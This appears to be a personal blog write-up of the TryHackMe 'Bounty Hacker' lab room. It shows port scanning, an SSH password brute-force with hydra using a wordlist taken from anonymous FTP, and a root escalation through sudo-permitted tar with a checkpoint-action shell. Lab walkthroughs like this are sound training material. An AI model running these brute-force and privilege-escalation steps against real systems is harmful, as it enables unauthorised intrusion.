TryHackMe — Bounty Hacker

Having fun with TryHackMe again. So, here is the write up and guideline to pass this Bounty Hacker challenge.

Room: https://tryhackme.com/room/cowboyhacker
Level: Easy

Task: You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

Lets get started

As usual, start the machine and open the IP in browser

There is a message but nothing special here. “Who wrote the task list?” I randomly test Jet and Ein but its not the correct one. Nevermind, try rustscan then,

# rustscan -a 10.10.192.X -u 5000 -- -sV -T4 -A
Open 10.10.192.X:21
Open 10.10.192.X:22
Open 10.10.192.X:80
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
...
...
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
...
...
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
...
...

There is 3 port opened and FTP is open for anonymous login. Using cyberduck,

There is 2 files available.

The task.txt says

1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-XXX

locks.txt says

rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e

Hmm.. looks like a password dict to me.. If the task is written the the XXX, then I can use as SSH user. Let’s try brute using dict locks.txt

# hydra -l XXX -P ~/Downloads/locks.txt 10.10.192.X ssh              
.....
.....
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.192.X:22/
[22][ssh] host: 10.10.192.X login: XXX password: XXXXXXXXXXXXXXXXX
1 of 1 target successfully completed, 1 valid password found
.....
.....

Ok that’s was easy. Let’s SSH

# ssh XXX@10.10.192.X                                  
XXX@10.10.192.X's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
83 packages can be updated.
0 updates are security updates.
Last login: Wed Apr 7 01:22:53 2021 from 10.8.163.74XXX@bountyhacker:~/Desktop$

Alright success entered the dungeon. Hehe..

# ls
user.txt
# cat user.txt
THM{XXXXXXXXXXXXXXXX}

Found the user flag. Now let’s go for the root. The first thing is check the list of command is allowed for invoking user

# sudo -l
[sudo] password for XXX:
Matching Defaults entries for XXX on bountyhacker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tar

Referring to GTFObins, by running this command, you will immediately enter root user

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
#

Alright then,

# ls -al /root
total 40
drwx------ 5 root root 4096 Jun 7 2020 .
drwxr-xr-x 24 root root 4096 Jun 6 2020 ..
-rw------- 1 root root 2694 Jun 7 2020 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwx------ 2 root root 4096 Feb 26 2019 .cache
drwxr-xr-x 2 root root 4096 Jun 7 2020 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 19 Jun 7 2020 root.txt
-rw-r--r-- 1 root root 66 Jun 7 2020 .selected_editor
drwx------ 2 root root 4096 Jun 7 2020 .ssh
# cat /root/root.txt
THM{XXXXXXXXXXXXXXX}

Done! Easy Peasy!

~~~ Happy Hacking ~~~

Software Engineer at Teratotech.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store